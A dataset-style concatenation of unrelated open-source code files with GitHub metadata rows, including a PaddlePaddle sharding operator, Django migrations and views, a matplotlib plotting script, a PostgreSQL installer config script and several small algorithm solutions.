    def is_output_compatible(self, dist_op):
        # Any output sharding is acceptable for transpose2.
        return True

    def is_auto_compatible(self, dist_op):
        """Checks that Out's dims mapping is X's permuted by `axis`, and that
        XShape carries X's mapping with a leading -1 (replicated) dim."""
        op_desc = dist_op.serial_op.desc
        op_dist_attr = dist_op.dist_attr
        perm = op_desc.attr('axis')
        x_name = op_desc.input('X')[0]
        out_name = op_desc.output('Out')[0]
        x_shape_name = op_desc.output('XShape')[0]
        x_shape_dims_mapping = op_dist_attr.get_output_dims_mapping(
            x_shape_name)
        x_dims_mapping = op_dist_attr.get_input_dims_mapping(x_name)
        out_dims_mapping = op_dist_attr.get_output_dims_mapping(out_name)
        # Permute X's dims mapping according to the transpose axes.
        new_dims_mapping = [-1 for i in range(len(x_dims_mapping))]
        for i in range(len(x_dims_mapping)):
            new_dims_mapping[i] = x_dims_mapping[perm[i]]
        if len(x_dims_mapping) != len(out_dims_mapping):
            return False
        if new_dims_mapping != out_dims_mapping:
            return False
        # XShape prepends one replicated dim, then mirrors X's mapping.
        if x_shape_dims_mapping[0] != -1:
            return False
        if x_shape_dims_mapping[1:] != x_dims_mapping[:]:
            return False
        return True

    def update_dims_mapping(self, dist_op):
        """Propagates compatible dims mappings between X and Out (via `axis`)
        and mirrors the result into XShape. Returns True if anything changed."""
        changed = False
        op_desc = dist_op.serial_op.desc
        op_dist_attr = dist_op.dist_attr
        x_name = op_desc.input('X')[0]
        out_name = op_desc.output('Out')[0]
        x_shape_name = op_desc.output('XShape')[0]
        x_dims_mapping = op_dist_attr.get_input_dims_mapping(x_name)
        out_dims_mapping = op_dist_attr.get_output_dims_mapping(out_name)
        x_shape_dims_mapping = op_dist_attr.get_output_dims_mapping(
            x_shape_name)
        perm = op_desc.attr('axis')
        assert len(x_dims_mapping) == len(perm)
        new_dims_mapping = [-1 for i in range(len(x_dims_mapping))]
        for i in range(len(x_dims_mapping)):
            new_dims_mapping[i] = x_dims_mapping[perm[i]]
        # Reconcile the permuted input mapping with the output mapping.
        for i in range(len(out_dims_mapping)):
            dim_changed = compute_compatible_and_update_dim_mapping(
                [new_dims_mapping, out_dims_mapping], [i, i])
            if dim_changed:
                changed = True
        # Write any reconciled dims back to X (inverse permutation).
        for i in range(len(x_dims_mapping)):
            if x_dims_mapping[perm[i]] != new_dims_mapping[i]:
                x_dims_mapping[perm[i]] = new_dims_mapping[i]
                changed = True
        # XShape's trailing dims always mirror X's mapping.
        for i in range(len(x_dims_mapping)):
            x_shape_dims_mapping[i + 1] = x_dims_mapping[i]
        return changed

    @staticmethod
    def backward(ctx, *args, **kwargs):
        # Backward sharding is handled elsewhere (_backward_implemented=False).
        pass
@staticmethod
def backward(ctx, *args, **kwargs):
pass
# Register the concrete implementation under its container.
register_distributed_operator_impl(
    "transpose2", DistributedTranspose2Impl("same_mapping_transpose"))
| [
"noreply@github.com"
] | xiegegege.noreply@github.com |
a64a16ccd106e89067e9f9d78718ab8be8dfd26c | 3e6dffad73b8d5024024b52b044c57a05e7e9655 | /assets/2020-01-18/zoogle/zdocs/migrations/0001_initial.py | 63b30f2d3ceded209f620d30b12c629ee113f1c1 | [
"MIT"
] | permissive | dhilipsiva/talks | 07f33b162d8db6e20e3d5974576d71c273629187 | 05581b6b8fdd0598d4ffed4bf75204d718719ed9 | refs/heads/master | 2022-08-05T12:27:39.932612 | 2022-07-21T07:43:36 | 2022-07-21T07:43:36 | 68,734,565 | 5 | 3 | MIT | 2021-07-30T11:24:12 | 2016-09-20T17:05:44 | Python | UTF-8 | Python | false | false | 888 | py | # Generated by Django 3.0.2 on 2020-01-17 11:51
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    """Initial migration: creates the ``Zdoc`` model."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Zdoc',
            fields=[
                # UUID primary key generated client-side (uuid4), not editable.
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                # Timestamps maintained automatically by Django.
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
                ('subject', models.CharField(max_length=200)),
                ('description', models.CharField(max_length=400)),
                ('size', models.IntegerField()),
                # Owner stored as a plain string, not a foreign key.
                ('owner', models.CharField(max_length=100)),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
| [
"dhilipsiva@pm.me"
] | dhilipsiva@pm.me |
b5da8a85646bf5e85130cdcf3f31dc9794265c46 | 83b5efa0d25c805971acf309146ca817f37692f2 | /src/visualization/markov_1_RMSE_comparison.py | 14c0f41a0dba1953a3e91bac58d3f03811fc6e2d | [
"MIT"
] | permissive | VictorOnink/Wind-Mixing-Diffusion | 3d104014de9e5d169c26320cca039aaaa1f490e2 | 16ac459f010ea3fd845335737a9a1e3f913b6103 | refs/heads/main | 2023-04-11T09:24:54.988598 | 2022-03-02T15:39:25 | 2022-03-02T15:39:25 | 314,201,646 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,748 | py | import matplotlib.pyplot as plt
import numpy as np
import analysis, settings
from visualization import utils_visualization as utils_v
def markov_1_RMSE_comparison(x_label=r'$u_{10}$ (m s$^{-1}$)', y_label=r'RMSE', fig_size=(16, 8),
                             ax_label_size=16, legend_size=11, wave_roughness=False):
    """
    A figure showing the RMSE of M-0 and M-1 simulations relative to the field data for the various wind conditions
    :param x_label: x axis label
    :param y_label: y axis label
    :param fig_size: figure size
    :param ax_label_size: axis label fontsize
    :param legend_size: legend fontsize
    :param wave_roughness: if True, have surface roughness be wave height dependent
    :return: None (the figure is written to settings.figure_dir)
    """
    # Setting the wind speeds, rise velocities and alpha values that we want to plot
    w_10 = [0.85, 2.4, 4.35, 6.65, 9.3]
    w_r = [-0.03, -0.003]
    alpha = [0.0, 0.1, 0.3, 0.5, 0.7, 0.95]
    # Setting a small offset so that markers for different rise velocities aren't plotted on top of each other
    rise_offset = {-0.03: 0.15, -0.003: -0.15}
    # Selecting the marker type according to the rise velocity
    marker_type = {-0.03: 'o', -0.003: 'X'}
    # Looping through the KPP simulations, and retrieving the RMSE values for them. First, for the M-0 simulations
    # Each point is a tuple (RMSE, x position, marker, color).
    point_list_KPP = []
    for index_w10, wind in enumerate(w_10):
        for rise in w_r:
            RMSE = analysis.determine_RMSE(wind, rise, 'KPP', 'Ceiling', alpha=0.0, output=True,
                                           wave_roughness=wave_roughness)
            plot_tuple = RMSE, index_w10 + 1, marker_type[rise], utils_v.return_color(0)
            point_list_KPP.append(plot_tuple)
    # Then for the M-1 simulations (one point per alpha, offset by rise velocity)
    for index_w10, wind in enumerate(w_10):
        for rise in w_r:
            for index_a, a in enumerate(alpha):
                RMSE = analysis.determine_RMSE(wind, rise, 'KPP', 'Ceiling_Markov', alpha=a, output=True,
                                               wave_roughness=wave_roughness)
                plot_tuple = RMSE, index_w10 + 1 + rise_offset[rise], marker_type[rise], utils_v.return_color(index_a + 1)
                point_list_KPP.append(plot_tuple)
    # Looping through the SWB simulations, and retrieving the RMSE values for them, first for the M-0 simulations
    point_list_Kukulka = []
    for index_w10, wind in enumerate(w_10):
        for rise in w_r:
            RMSE = analysis.determine_RMSE(wind, rise, 'SWB', 'Ceiling', alpha=0.0, output=True,
                                           wave_roughness=wave_roughness)
            plot_tuple = RMSE, index_w10 + 1, marker_type[rise], utils_v.return_color(0)
            point_list_Kukulka.append(plot_tuple)
    # And then for M-1 simulations
    for index_w10, wind in enumerate(w_10):
        for rise in w_r:
            for index_a, a in enumerate(alpha):
                RMSE = analysis.determine_RMSE(wind, rise, 'SWB', 'Ceiling_Markov', alpha=a, output=True,
                                               wave_roughness=wave_roughness)
                plot_tuple = RMSE, index_w10 + 1 + rise_offset[rise], marker_type[rise], utils_v.return_color(index_a + 1)
                point_list_Kukulka.append(plot_tuple)
    # Creating the axis
    fig = plt.figure(figsize=fig_size)
    # Adding the axis for KPP
    ax = fig.add_subplot(121)
    ax.set_xlabel(x_label, fontsize=ax_label_size)
    ax.set_xlim((0, 6))
    ax.tick_params(axis='both', labelsize=ax_label_size)
    ax.set_ylabel(y_label, fontsize=ax_label_size)
    ax.set_ylim((0, 0.15))
    # Adding the axis for SWB
    ax2 = fig.add_subplot(122)
    ax2.set_xlim((0, 6))
    ax2.set_xlabel(x_label, fontsize=ax_label_size)
    ax2.tick_params(axis='both', labelsize=ax_label_size)
    ax2.tick_params(labelleft=False)
    # X axis = Concentration axis
    ax2.set_ylim((0, 0.15))
    ax.set_title(r'(a) KPP', fontsize=ax_label_size)
    ax2.set_title(r'(b) SWB', fontsize=ax_label_size)
    # Now, plotting the points
    # NOTE(review): mfc=None means "use the default face color", not hollow
    # markers — for unfilled markers matplotlib expects mfc='none'. Confirm
    # which was intended.
    for point in point_list_KPP:
        RMSE, index_w10, marker, color = point
        ax.plot(index_w10, RMSE, color=color, marker=marker, alpha=0.7, markersize=10, mfc=None)
    for point in point_list_Kukulka:
        RMSE, index_w10, marker, color = point
        ax2.plot(index_w10, RMSE, color=color, marker=marker, alpha=0.7, markersize=10, mfc=None)
    # Now, altering the Y axis to list the wind speeds instead of the simple labels 1 - 5
    ax.set_xticks(range(7))
    ax.set_xticklabels(['', 0.85, 2.40, 4.35, 6.65, 9.30, ''])
    ax2.set_xticks(range(7))
    ax2.set_xticklabels(['', 0.85, 2.40, 4.35, 6.65, 9.30, ''])
    # Next, adding a legend to explain the color scheme and the marker type
    # Showing the marker type according to the rise velocity (empty plots are
    # used purely as legend handles).
    marker = [plt.plot([], [], c='k', markersize=10, marker=marker_type[rise], label=label_marker(rise), linestyle='')[0] for rise in
              w_r]
    # Showing the color according to M-0/M-1 with alpha values
    markov0 = [plt.plot([], [], c=utils_v.return_color(0), markersize=10, marker='o', label='M0', linestyle='')[0]]
    markov1 = [plt.plot([], [], c=utils_v.return_color(ind + 1), markersize=10, marker='o',
                        label=r'M1 - $\alpha = $' + '{}'.format(a), linestyle='')[0] for ind, a in
               enumerate(alpha)]
    # Adding the legend
    ax2.legend(handles=marker + markov0 + markov1, fontsize=legend_size, loc='lower left')
    # Saving the figure
    plt.savefig(settings.figure_dir + 'model_evaluation_markov_1.png', bbox_inches='tight', dpi=600)
def label_marker(rise):
    """Build the legend label showing the magnitude of the rise velocity."""
    magnitude = np.abs(rise)
    return r'$w_{r}$ = %s m s$^{-1}$' % magnitude
| [
"31734765+VictorOnink@users.noreply.github.com"
] | 31734765+VictorOnink@users.noreply.github.com |
0afd4eee10e14e1b6303f505244a18b388f4e105 | 20132d827a96afa4f33da2424dbb52f58f01a844 | /Hash/Lessons42579/gamjapark_solution.py | bf234183778a0c3d46a8bfacfae6c1483158d56c | [
"MIT"
def solution(genres, plays):
    """Return song indices for a "best album".

    For each genre, ordered by total play count (descending), pick the up-to
    two most played songs. Ties are broken as in the original implementation:
    genres with equal totals keep first-appearance order (stable sort), and
    songs with equal plays keep lower-index-first order.

    Improvements over the original: a single O(N) grouping pass replaces the
    per-genre rescan of every song (O(G*N)), and the one-entry-dict
    contortions and shadowed loop names are gone.

    Args:
        genres: list of genre names, one per song.
        plays: list of play counts, aligned with ``genres``.

    Returns:
        List of song indices, at most two per genre.
    """
    totals = {}          # genre -> total plays; insertion order = first appearance
    songs_by_genre = {}  # genre -> [(index, plays), ...] in input order
    for index, (genre, play_count) in enumerate(zip(genres, plays)):
        totals[genre] = totals.get(genre, 0) + play_count
        songs_by_genre.setdefault(genre, []).append((index, play_count))

    answer = []
    # sorted() is stable, so equal totals preserve first-appearance order.
    for genre, _ in sorted(totals.items(), key=lambda item: -item[1]):
        ranked = sorted(songs_by_genre[genre], key=lambda song: (-song[1], song[0]))
        answer.extend(index for index, _ in ranked[:2])
    return answer
"gojang4@gmail.com"
] | gojang4@gmail.com |
def calcula_area_do_triangulo(b, h):
    """Return the area of a triangle with base ``b`` and height ``h``.

    Fixes a NameError in the original, which assigned ``area_triangulo`` but
    returned the undefined name ``area_do_triangulo``.
    """
    return (b * h) / 2
# NOTE(review): the area function defined above is never called here — the
# script only prints the raw base and height. Presumably the exercise meant
# to print the computed area; verify against the assignment statement.
base=10
altura=5
print(base,altura)
| [
"you@example.com"
] | you@example.com |
0885fc81f9c934a44e70c6659f760daee032544c | 1a07ef7e046c6cc278cfbd2e3d2e15b03d9e11b5 | /collections-namedtuple.py | 56c2e6ab87774041da0f213182dfd47b551c928d | [] | no_license | tjguk/lightning-collections | 273b7da18ad6cf225186fb074685ad670d59bab1 | 6e78a2afbf880d611af7ebe52c8d764bf400b245 | refs/heads/master | 2020-06-02T10:26:17.518183 | 2012-09-06T12:42:35 | 2012-09-06T12:42:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | import os, sys
from collections import namedtuple
import csv
# NOTE: this is Python 2 code ("rb" mode for csv, reader.next(), print
# statement) — do not run under Python 3 without porting.
with open("files.csv", "rb") as f:
    reader = csv.reader(f)
    # First CSV row is the header; it names the namedtuple fields.
    fields = reader.next()
    Row = namedtuple("Row", fields)
    # Materialise every remaining row as a Row instance.
    files = [Row(*row) for row in reader]
# Show the first ten rows. NOTE(review): the loop variable `f` shadows the
# (closed) file handle above.
for f in files[:10]:
    print f
| [
"mail@timgolden.me.uk"
] | mail@timgolden.me.uk |
ac76c3ad644fa22d248fc653a359b84f9b4c9d09 | 434b9b85bb901a4e50977e14a74aa4592b583ea2 | /old/config/share/databases/defaultdb/lenny/postgresql_server/script-config | f29b1fe4c02ca77a804fc4f94c0dbd57897f5473 | [] | no_license | umeboshi2/paella | 12dd9f4785588cd501d7916171a5179b7c29bb31 | df4cf032a100ea1c109bcf02b1c74bb217bc84c6 | refs/heads/master | 2021-01-25T12:07:20.785787 | 2015-06-02T16:03:30 | 2015-06-02T16:03:30 | 7,497,284 | 5 | 3 | null | 2015-01-23T22:25:19 | 2013-01-08T07:11:58 | Python | UTF-8 | Python | false | false | 4,911 | #!/usr/bin/python
import sys
from useless.base.path import path
from paella.installer.toolkit import InstallerTools
# Python 2 script: installer-side configuration of a PostgreSQL 8.3 server.
print "config script for postgresql_server"
it = InstallerTools()
# NOTE(review): `env` is assigned but not used in the rest of this script;
# possibly kept for its side effects — confirm before removing.
env = it.env()
# psql script run inside template1: temporarily allow connections to
# template0, drop and recreate template1 from it with the encoding
# substituted for %s, then restore the template flags.
recreate_template1_instructions="""UPDATE pg_database SET datallowconn = TRUE where datname = 'template0';
\c template0
UPDATE pg_database SET datistemplate = FALSE where datname = 'template1';
drop database template1;
create database template1 with template = template0 encoding = '%s';
UPDATE pg_database SET datistemplate = TRUE where datname = 'template1';
\c template1
UPDATE pg_database SET datallowconn = FALSE where datname = 'template0';
"""
# TYPE DATABASE USER CIDR-ADDRESS METHOD
# "local" is for Unix domain socket connections only
# paella local connections
# IPv4 local connections:
# paella ipv4 connections
# IPv6 local connections:
# paella ipv6 connections
def is_marker(line):
    """Return the connection type ('local', 'ipv4', 'ipv6') for a paella
    marker comment in pg_hba.conf, or '' if the line is not a marker."""
    markers = (
        ('# paella local connections', 'local'),
        ('# paella ipv4 connections', 'ipv4'),
        ('# paella ipv6 connections', 'ipv6'),
    )
    for prefix, conntype in markers:
        if line.startswith(prefix):
            return conntype
    return ''
def get_connections(conntype):
    """Read the configured pg_hba lines for *conntype* from the profile.

    The profile stores a count under '<conntype>_connections' and the lines
    themselves under '<conntype>_connection_1' .. '<conntype>_connection_N'
    (numbering starts at 1).
    """
    count_key = 'postgresql_server:%s_connections' % conntype
    total = int(it.get(count_key))
    return [it.get('postgresql_server:%s_connection_%d' % (conntype, number))
            for number in range(1, total + 1)]
def configure_pghba_conf(toolkit):
    """Insert the profile's connection lines into the target pg_hba.conf.

    Every '# paella ... connections' marker line is kept and the configured
    lines for that connection type are appended directly after it.
    """
    conf_path = toolkit.target / 'etc/postgresql/8.3/main/pg_hba.conf'
    updated = []
    for line in conf_path.lines():
        updated.append(line)
        section = is_marker(line)
        if section:
            updated.extend(get_connections(section))
    conf_path.write_lines(updated)
# here the cmd must be a space separated
# shell type command, a list won't work
def su_postgres_cmd(toolkit, cmd):
    """Run *cmd* inside the chroot as the postgres user.

    *cmd* must be a space-separated shell-style command string, not a list,
    because it is passed verbatim to ``su -c``.
    """
    toolkit.chroot(['su', 'postgres', '-c', cmd])
def recreate_template1(toolkit):
    # Rebuild template1 (copied from template0) so it carries the encoding
    # configured under postgresql_server:default_encoding.
    it = toolkit
    encoding = it.get('postgresql_server:default_encoding')
    print "creating new template1 with encoding:", encoding
    cmd = ['su', 'postgres', '-c', 'psql template1']
    # Feed the module-level SQL recipe to psql over stdin inside the chroot.
    proc = it.chroot_proc(cmd, stdin=it.PIPE)
    instructions = recreate_template1_instructions % encoding
    proc.stdin.write(instructions)
    proc.stdin.flush()
    proc.stdin.close()
    retval = proc.wait()
    if retval:
        # Non-zero psql exit status aborts the whole config script.
        raise RuntimeError , "Problem with dropping template1"
def create_pg_users(toolkit):
    # Create every user listed in postgresql_server:postgresql_users,
    # applying that user's createuser_opts_<name> command-line options.
    it = toolkit
    users = it.getcsv('postgresql_server:postgresql_users')
    for user in users:
        opt = it.get('postgresql_server:createuser_opts_%s' % user)
        cmd = 'createuser %s %s' % (opt, user)
        print "Creating postgresql user", user
        su_postgres_cmd(it, cmd)
def create_language(toolkit, language, database):
    # Install one procedural language into *database* via createlang.
    cmd = 'createlang %s %s' % (language, database)
    print "Creating language, %s in database %s" % (language, database)
    su_postgres_cmd(toolkit, cmd)
# all initial databases are copies of
# the template1 database. If you want
# a language that is specific to a database,
# it will have to be done by other means.
def create_template1_languages(toolkit):
    """Install each configured procedural language into template1, so every
    database later copied from it inherits them (see the comment above)."""
    for language in toolkit.getcsv('postgresql_server:template1_languages'):
        create_language(toolkit, language, 'template1')
def create_initial_databases(toolkit):
    # Create every database named in postgresql_server:initial_databases;
    # each one is an implicit copy of template1.
    it = toolkit
    databases = it.getcsv('postgresql_server:initial_databases')
    for database in databases:
        cmd = 'createdb %s' % database
        print "Creating database", database
        su_postgres_cmd(toolkit, cmd)
# Execution order matters: pg_hba entries and the rebuilt template1 must be
# in place before users, languages and databases are created from it.
configure_pghba_conf(it)
recreate_template1(it)
create_pg_users(it)
create_template1_languages(it)
create_initial_databases(it)
#-- Connect as the postgres superuser, e.g.:
# -- psql -U postgres template1
# -- Then run:
# UPDATE pg_database SET datallowconn = TRUE where datname = 'template0';
# \c template0
# UPDATE pg_database SET datistemplate = FALSE where datname = 'template1';
# drop database template1;
# create database template1 with template = template0 encoding = 'UNICODE';
# UPDATE pg_database SET datistemplate = TRUE where datname = 'template1';
# \c template1
# UPDATE pg_database SET datallowconn = FALSE where datname = 'template0';
| [
"umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f"
] | umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f | |
6fbc0d258e0586e2a8a11eadc79b68c6fd0decf4 | b2ccb163ea78887c32c9ce7e4513ae9db577e3cf | /Machine Learning A-Z/Part 7 - Natural Language Processing/Section 36 - Natural Language Processing/runstep3.py | 6a33dd541bda3329bc92aa552e7c08a366ff6589 | [] | no_license | Ukabix/machine-learning | f5966fec211d140e1297a2364789444f464a7caa | 0f80ff342cf186803320084bcc4a5e0e73d1fe8f | refs/heads/master | 2021-11-08T07:35:43.515249 | 2021-10-26T10:00:03 | 2021-10-26T10:00:03 | 213,165,560 | 0 | 0 | null | 2019-10-08T09:46:40 | 2019-10-06T12:36:05 | Python | UTF-8 | Python | false | false | 847 | py | # NLP - Bag of words
# Natural Language Processing
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Restaurant_Reviews.tsv', delimiter = '\t', quoting = 3) # tab-separated input; quoting=3 (QUOTE_NONE) keeps embedded " characters
# cleaning the texts
# stemming: collapse inflected forms (e.g. loved/loving) to one root token
import re
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
# import stemmer
from nltk.stem.porter import PorterStemmer
# Keep letters only, lower-case, and tokenise the first review (index 0).
review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][0])
review = review.lower()
review = review.split()
# call stemmer
ps = PorterStemmer()
# Drop English stopwords, stemming whatever remains.
review = [ps.stem(word) for word in review if not word in stopwords.words('english')]
# for larger texts use below to create a set (O(1) membership tests):
# review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
| [
"54454097+Ukabix@users.noreply.github.com"
] | 54454097+Ukabix@users.noreply.github.com |
eeb6e3d020373099a4465df961980ece301619ae | 11771f5dd90a74d5c76765f27f0d9a9cb044f57b | /route/user_setting_top_menu.py | b9016c93c76dfbf472686e9b9939945095559130 | [
"BSD-3-Clause"
] | permissive | openNAMU/openNAMU | cc031ea848ac6d829ad243fcf59da26adf0f0814 | 868107e4ef53e4e78af15c590673b78ee385baa5 | refs/heads/beta | 2023-08-24T10:20:00.245680 | 2023-08-23T14:09:53 | 2023-08-23T14:09:53 | 78,184,261 | 86 | 75 | BSD-3-Clause | 2023-09-13T21:36:03 | 2017-01-06T07:22:10 | Python | UTF-8 | Python | false | false | 2,222 | py | from .tool.func import *
def user_setting_top_menu():
    """Render or update the current user's custom top-menu setting.

    POST: upsert the submitted 'content' into user_set (name 'top_menu',
    keyed by the identifier returned by ip_check()) and redirect back.
    GET: render the edit form pre-filled with the stored value.
    """
    with get_db_connect() as conn:
        curs = conn.cursor()
        ip = ip_check()
        # Banned users may not change settings.
        if ban_check(ip) == 1:
            return re_error('/ban')
        if flask.request.method == 'POST':
            # NOTE(review): existence is probed in the 'other' table rather
            # than in user_set for this id - looks suspicious; confirm the
            # update/insert choice cannot duplicate or miss rows.
            curs.execute(db_change("select name from other where name = 'top_menu'"))
            if curs.fetchall():
                curs.execute(db_change("update user_set set data = ? where name = 'top_menu' and id = ?"), [flask.request.form.get('content', ''), ip])
            else:
                curs.execute(db_change("insert into user_set (name, data, id) values ('top_menu', ?, ?)"), [flask.request.form.get('content', ''), ip])
            conn.commit()
            return redirect('/setting/top_menu')
        else:
            # Stored menu text for this user, '' when none has been saved yet.
            curs.execute(db_change("select data from user_set where name = 'top_menu' and id = ?"), [ip])
            db_data = curs.fetchall()
            db_data = db_data[0][0] if db_data else ''
return easy_minify(flask.render_template(skin_check(),
imp = [load_lang('user_added_menu'), wiki_set(), wiki_custom(), wiki_css([0, 0])],
data = '''
<span>
EX)
<br>
ONTS
<br>
https://2du.pythonanywhere.com/
<br>
FrontPage
<br>
/w/FrontPage
</span>
<hr class="main_hr">
''' + load_lang('not_support_skin_warning') + '''
<hr class="main_hr">
<form method="post">
<textarea class="opennamu_textarea_500" placeholder="''' + load_lang('enter_top_menu_setting') + '''" name="content" id="content">''' + html.escape(db_data) + '''</textarea>
<hr class="main_hr">
<button id="opennamu_save_button" type="submit">''' + load_lang('save') + '''</button>
</form>
''',
menu = [['setting', load_lang('return')]]
)) | [
"min08101@naver.com"
] | min08101@naver.com |
ff8d99be9ba8504e548a98344c65a23d7a5cdb13 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_172/ch35_2020_04_10_18_41_08_169350.py | ac2467fe93019c432612c8377d076ebdb0ddf1f0 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | x = int(input('numero: '))
# Accumulate the integers typed by the user; entering 0 ends the input.
# The sentinel test lives directly in the loop condition instead of a
# separate boolean flag.
soma = 0
while x != 0:
    soma = soma + x
    x = int(input('numero: '))
print (soma) | [
"you@example.com"
] | you@example.com |
f8f02a246f4d5c420abe71734d426e5f77389c3b | bb5b63774924abe86c2cb0d8a09795fcf1a4d822 | /chat/views.py | 0b613a45f48e1e833992141c24ab0fda3260f81c | [] | no_license | IdenTiclla/realtime_chat_app | 769bf432e993ee79cb93bd54489305db3526f4d5 | d2a5187bb9f257c5e8fefe6735d23e5d0eec64e6 | refs/heads/master | 2023-06-23T17:47:41.766605 | 2021-07-21T21:00:25 | 2021-07-21T21:00:25 | 387,920,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,343 | py | from typing import List
from django.shortcuts import render, redirect
from chat.models import Room, Message
from django.http import HttpResponse, JsonResponse
# Create your views here.
def home(request):
return render(request, 'home.html')
def room(request, room):
username = request.GET['username']
room_details = Room.objects.get(name=room)
return render(request, 'room.html', {'username': username, 'room_details': room_details, 'room': room})
def checkview(request):
room = request.POST['room_name']
username = request.POST['username']
if Room.objects.filter(name=room).exists():
return redirect('/'+room+'/?username=' + username)
else:
new_room = Room.objects.create(name=room)
new_room.save()
return redirect('/'+room+'/?username=' + username)
def send(request):
message = request.POST['message']
username = request.POST['username']
room_id = request.POST['room_id']
new_message = Message.objects.create(value=message, user=username, room=room_id)
new_message.save()
return HttpResponse('message sent successfully')
def getMessages(request, room):
room_details = Room.objects.get(name=room)
messages = Message.objects.filter(room=room_details.id)
return JsonResponse({
"messages": list(messages.values())
})
| [
"iden.ticlla@gmail.com"
] | iden.ticlla@gmail.com |
2728b2991bd08e88147fbdd4f649c902775aeb96 | 48c65330f577d11cedb29fd970aee35788ab72c6 | /ctrl_api_magento2_tierprice__upload.py | 49630511be6a3891ec8208159908d6b16d1bc9d4 | [] | no_license | yeboyebo/elganso_sync | 309ecbaba3127493abe001cd1704cc7098234baa | 66f033a0e27a05c1fc6704ec6ba2bd474d204b7e | refs/heads/master | 2023-07-22T00:17:48.201252 | 2023-07-19T07:48:40 | 2023-07-19T07:48:40 | 173,096,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | import json
from django.http import HttpResponse
from sync.tasks import task_manager
# @class_declaration interna_upload #
class interna_upload():
    # Empty base class: a hook point shared by the generated upload classes.
    pass
# @class_declaration elganso_sync_upload #
from models.flsyncppal import flsyncppal_def as syncppal
class elganso_sync_upload(interna_upload):
    """Password-checked endpoint that triggers the Magento2 tier-price
    upload task and returns its result as JSON."""
    @staticmethod
    def start(pk, data):
        # The configured password is only fetched when a passwd was sent
        # (short-circuit kept from the original).
        if "passwd" in data and data["passwd"] == syncppal.iface.get_param_sincro('apipass')['auth']:
            response = task_manager.task_executer("mg2_tierprice_upload", data)
            payload = response["data"]
            status = response["status"]
        else:
            payload = {"msg": "Autorización denegada"}
            status = 401
        return HttpResponse(json.dumps(payload), status=status, content_type="application/json")
# @class_declaration upload #
class upload(elganso_sync_upload):
    # Concrete alias of elganso_sync_upload; inherits start() unchanged.
    pass
| [
"jesus.yeboyebo@gmail.com"
] | jesus.yeboyebo@gmail.com |
d206f151b94adc10fe4c49e4dbcce4e98915b17d | b01f25b447d5ec3d6bc08380ae2601d5badb6af3 | /sortbypower.py | 915263174c405422441a673ddfc3037fb3ddf3eb | [] | no_license | SurajPatil314/Leetcode-problems | 0b05faab17214437a599d846dd1c9a7ea82b9c4c | 9201a87246842855281c90a9705f83fce24d1137 | refs/heads/master | 2021-09-05T02:20:05.274438 | 2021-08-09T21:24:05 | 2021-08-09T21:24:05 | 203,467,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | '''
The power of an integer x is defined as the number of steps needed to transform x into 1 using the following steps:
if x is even then x = x / 2
if x is odd then x = 3 * x + 1
For example, the power of x = 3 is 7 because 3 needs 7 steps to become 1 (3 --> 10 --> 5 --> 16 --> 8 --> 4 --> 2 --> 1).
Given three integers lo, hi and k. The task is to sort all integers in the interval [lo, hi] by the power value in ascending order, if two or more integers have the same power value sort them by ascending order.
Return the k-th integer in the range [lo, hi] sorted by the power value.
Notice that for any integer x (lo <= x <= hi) it is guaranteed that x will transform into 1 using these steps and that the power of x will fit in a 32 bit signed integer.
'''
class Solution:
    def getKth(self, lo: int, hi: int, k: int) -> int:
        """Return the k-th integer in [lo, hi] when sorted by Collatz power.

        The "power" of x is the number of Collatz steps (x -> x/2 when even,
        x -> 3x+1 when odd) needed to reach 1; ties in power are broken by
        ascending value.

        Fixes vs. the original: ``operator.itemgetter`` was used without an
        import (a NameError outside LeetCode's harness), and the even step
        used float division; both are replaced below.
        """
        def power(x: int) -> int:
            # Count Collatz steps until x collapses to 1.
            steps = 0
            while x != 1:
                x = 3 * x + 1 if x % 2 else x // 2
                steps += 1
            return steps

        # Explicit (power, value) key encodes the required tie-break instead
        # of relying on sort stability plus dict insertion order.
        ordered = sorted(range(lo, hi + 1), key=lambda x: (power(x), x))
        return ordered[k - 1]
| [
"spatil2@umbc.edu"
] | spatil2@umbc.edu |
7e6bc2f7d0f3a1bc0d8311b35964e5b1f1bbad93 | cc632d66ccceb5f7bd739553cdb4054a0f1c0035 | /account/migrations/0001_initial.py | eee939a7d781d678f814c0532bd7e242beb8fde4 | [] | no_license | raimbaev223/django-by-example__bookmarks | b3b197c75906d0e49c495f5d8511517ddef62e08 | 59c4b35f5c739b824bd3e8073993a81b3a4e8845 | refs/heads/master | 2023-03-19T10:39:13.003427 | 2021-03-18T06:45:07 | 2021-03-18T06:45:07 | 347,860,635 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | # Generated by Django 3.1.7 on 2021-03-15 05:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django 3.1.7 (see the header comment); avoid hand
    # editing once this migration has been applied anywhere.
    initial = True
    dependencies = [
        # Profile links one-to-one to whatever model AUTH_USER_MODEL names.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='Profile',
            fields=[
